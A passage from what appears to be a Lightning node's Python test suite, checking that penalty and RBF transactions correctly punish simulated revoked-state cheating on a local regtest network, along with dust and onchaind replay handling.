l2.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l2 sees that l1 has spent their coins!
l1.daemon.wait_for_logs(['Grinding for to_remote',
'Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by'])
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_fulfill(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
block chain advances, l2 broadcasts their htlc fulfill tx
l3 comes back online, sees l2's cheat. takes funds from htlc fulfill tx.
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2, l3, l4 = node_factory.line_graph(4,
opts=[{'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None},
{'plugin': coin_mvt_plugin,
'disable-mpp': None,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'dev-no-reconnect': None,
'may_reconnect': True}],
wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
# push some money so that 1 + 4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
l1.rpc.waitsendpay(inv['payment_hash'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
l2.rpc.waitsendpay(inv['payment_hash'])
# now we send one 'sticky' htlc: l4->l1
amt = 10**8 // 2
sticky_inv = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv['payment_hash'], payment_secret=sticky_inv['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
l2.daemon.wait_for_log('coins payment_hash: {}'.format(sticky_inv['payment_hash']))
# l2 moves on for closed l3
bitcoind.generate_block(1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX'])
l3.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
bitcoind.generate_block(1)
l3.daemon.wait_for_log('Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_timeout(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
^---> l5
l1 pushes money to l5, who doesn't fulfill (freezing htlc across l2-l3)
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
block chain advances, l2 broadcasts the timeout htlc_tx + fulfill htlc_tx
both of which have a delay. l2 goes ahead and 'steals back' their
output + the htlc they fulfill
l3 comes back online, sees l2's cheat. takes funds from htlc timeout tx
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2, l3, l4, l5 = node_factory.get_nodes(
5,
opts=[
{
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'dev-no-reconnect': None,
}, {
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
'allow_broken_log': True,
}
]
)
node_factory.join_nodes([l1, l2, l3, l4], wait_for_announce=True)
node_factory.join_nodes([l3, l5], wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
# push some money so that 1 + 4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
# now we send two 'sticky' htlcs, l1->l5 + l4->l1
amt = 10**8 // 2
sticky_inv_1 = l5.rpc.invoice(amt, '2', 'sticky')
route = l1.rpc.getroute(l5.info['id'], amt, 1)['route']
l1.rpc.sendpay(route, sticky_inv_1['payment_hash'], payment_secret=sticky_inv_1['payment_secret'])
l5.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
sticky_inv_2 = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv_2['payment_hash'], payment_secret=sticky_inv_2['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 2)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2, now back a bit. force close channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
l2.daemon.wait_for_log('coins payment_hash: {}'.format(sticky_inv_2['payment_hash']))
# l2 moves on for closed l3
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 16 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# after 5 blocks, l2 reclaims both their DELAYED_OUTPUT_TO_US and their delayed output
bitcoind.generate_block(5, wait_for_mempool=0)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_logs(['Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US',
'Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_UNILATERAL/DELAYED_OUTPUT_TO_US'])
bitcoind.generate_block(10, wait_for_mempool=2)
l2.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/THEIR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX',
'Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM',
'Propose handling THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
# Make sure we've broadcast the tx we expect (other channels shutting down can create
# unrelated txs!)
# In theory this could have occurred before all the previous loglines appeared.
l3.daemon.logsearch_start = 0
line = l3.daemon.wait_for_log(r'Broadcasting OUR_PENALTY_TX \([0-9a-f]*\) to resolve THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
tx = re.search(r'\(([0-9a-f]*)\)', line).group(1)
txid = bitcoind.rpc.decoderawtransaction(tx)['txid']
bitcoind.generate_block(1, wait_for_mempool=[txid])
l3.daemon.wait_for_log('Resolved THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_normal(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed.
'''
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding lightningd
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
options={'watchtime-blocks': to_self_delay})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
def get_rbf_tx(self, depth, name, resolve):
r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
.format(name, resolve, depth))
return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 8):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# l2 should RBF, twice even, one for the l1 main output,
# one for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the order in which l2 generated RBF transactions
# would be acceptable to Bitcoin.
for tx in rbf_txes:
# Use the bcli interface as well, so that we also check the
# bcli interface.
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# And l2 should consider it in its listfunds.
assert(len(l2.rpc.listfunds()['outputs']) >= 1)
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_burn(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed and we are willing to burn
it all up to spite the thief.
'''
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding lightningd
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
options={'watchtime-blocks': to_self_delay})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
def get_rbf_tx(self, depth, name, resolve):
r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
.format(name, resolve, depth))
return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 10):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# l2 should RBF, twice even, one for the l1 main output,
# one for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the last two txes can be broadcast.
# These should donate the total amount to miners.
rbf_txes = rbf_txes[-2:]
for tx in rbf_txes:
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# l2 donated it to the miners, so it owns nothing
assert(len(l2.rpc.listfunds()['outputs']) == 0)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where opener immediately drops to chain"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
# Make locktime different, as we once had them reversed!
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'plugin': coin_mvt_plugin},
{'watchtime-blocks': 10,
'plugin': coin_mvt_plugin}],
fundchannel=False)
l1.fundwallet(10**7)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2 = node_factory.line_graph(2, opts={'plugin': coin_mvt_plugin})
channel_id = first_channel_id(l1, l2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And lightningd should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'watchtime-blocks': 201, 'cltv-delta': 101,
'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500)},
{'watchtime-blocks': 201, 'cltv-delta': 101}])
inv = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1, wait_for_mempool=1)
# Wait for nodes to notice the failure, this seach needle is after the
# DB commit so we're sure the tx entries in onchaindtxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['@WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Must be dust!
inv = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
